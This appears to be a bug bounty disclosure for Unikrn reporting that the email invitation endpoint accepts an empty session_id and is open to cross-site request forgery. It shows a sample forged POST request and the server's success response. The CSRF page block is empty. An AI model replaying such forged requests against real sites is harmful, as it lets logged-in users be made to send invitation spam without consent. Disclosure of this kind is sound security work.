session_id is not being validated at email invitation endpoint request sample: ``` POST /apiv1/inviteemail HTTP/1.1 Host: unikrn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://unikrn.com/profile Content-Type: application/json Application-Version: v3.9.1-1476-g6500a2c Content-Length: 51 Cookie: ... Connection: close {"email":"victim@email.com","session_id":""} ``` response sample: ``` HTTP/1.1 200 OK Date: Thu, 23 Nov 2017 14:26:58 GMT Content-Type: application/json Content-Length: 150 Connection: close Access-Control-Allow-Origin: * Access-Control-Max-Age: 86400 Cache-Control: no-store, no-cache, must-revalidate CI: M-production C-1 V-1.2.0 Content-Security-Policy: default-src 'none'; frame-ancestors 'none' Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Vary: Accept-Encoding Vary: Origin X-XSS-Protection: 1; mode=block Server: cloudflare-nginx CF-RAY: 3c24ce767b1e340f-HKG {"error":false,"success":true,"msg":"We invited victim@email.com for you","msg_trans":"We invited victim@email.com for you","data":null} ``` CSRF Page: ``` ``` ## Impact The victim email get filled on behalf of legitimated users visiting the CSRF page

Unikrn: session_id is not being validated at email invitation endpoint